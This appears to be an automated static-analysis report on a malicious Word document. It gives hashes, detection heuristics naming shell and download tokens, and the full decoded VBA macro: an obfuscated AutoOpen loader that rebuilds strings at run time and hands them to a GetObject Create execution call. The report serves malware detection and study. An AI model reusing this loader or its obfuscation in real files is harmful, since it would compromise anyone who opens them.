Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 6eb4be179e9388cd…

MALICIOUS

Office (OLE) / .DOC

Size: 49.0 KB
Created: 2026-06-07 14:27:00
Authoring application: Microsoft Office Word
First seen: 2026-06-12
MD5: c0f5e204237f6961fc8cfb2ba808c036
SHA-1: 2b49c497993371f44aa3981a3880a99e00c72f71
SHA-256: 6eb4be179e9388cd8baaeb4c836defe383f5db883539295c20b94d6576ca43dd
Risk score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains obfuscated VBA macros that execute automatically when the document is opened. The AutoOpen macro calls a function that decodes a string and then hands the result to a GetObject(...).Get(...).Create call to execute it, likely downloading and running a second-stage payload. The encoded string '212205210203132149150155146148146148146149' is passed to the macro's decoding function, which reconstructs the command at run time, so the command never appears in clear text in the macro source.

Heuristics (7)

  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2775 bytes
SHA-256: e3ab0ded95f4e1082ba9a40510e534e010866eadfe8898fe44b3a04ae71e6e5a
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
jz054rbwtixmwa6jejbwon7cvbobz1gx
End Sub
Sub jz054rbwtixmwa6jejbwon7cvbobz1gx()
Dim l8tdecw4cozlmnzocl4k5m1dsjqfuio2v As String
Dim ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc As String
l8tdecw4cozlmnzocl4k5m1dsjqfuio2v = "212205210203132149150155146148146148146149"
ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc = oxu2evofdxsizrycavxlka2xzoscvwelnm(l8tdecw4cozlmnzocl4k5m1dsjqfuio2v)
On Error Resume Next
If ActiveDocument.Name <> oxu2evofdxsizrycavxlka2xzoscvwelnm("204201208208211146200211199") Then
Exit Sub
End If
On Error GoTo 0
Dim vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k As String
Dim e5ca22rchaysxzcyu2texchpjwu7aidfh7x As String
Dim axa64zdnqqq6wwf6k9_neq7s5wg3ace9 As Variant
Dim eqti5eq45il2pe5sosnqzt2hff9rb75z5 As Variant
vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k = oxu2evofdxsizrycavxlka2xzoscvwelnm("219205210209203209216215158192192146192214211211216192199205209218150")
e5ca22rchaysxzcyu2texchpjwu7aidfh7x = oxu2evofdxsizrycavxlka2xzoscvwelnm("187205210151150195180214211199201215215")
eqti5eq45il2pe5sosnqzt2hff9rb75z5 = Null
GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9
End Sub
Function nj2nt75h5d1yj3kftbzs7my9hdkpo9u(EwEzUQXdDBaJZwBWymxYzQSDF)
nj2nt75h5d1yj3kftbzs7my9hdkpo9u = Chr(EwEzUQXdDBaJZwBWymxYzQSDF - 1)
End Function
Function tw9mxq9qumbcrtd1aq9jjhi96akuz5vm(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx)
tw9mxq9qumbcrtd1aq9jjhi96akuz5vm = Left(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx, 3)
End Function
Function fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg)
fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb = Right(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg, Len(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg) - 3)
End Function
Function oxu2evofdxsizrycavxlka2xzoscvwelnm(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)
Do
OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa + nj2nt75h5d1yj3kftbzs7my9hdkpo9u(tw9mxq9qumbcrtd1aq9jjhi96akuz5vm(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj))
HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj = fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)
Loop While Len(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj) > 0
oxu2evofdxsizrycavxlka2xzoscvwelnm = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa
End Function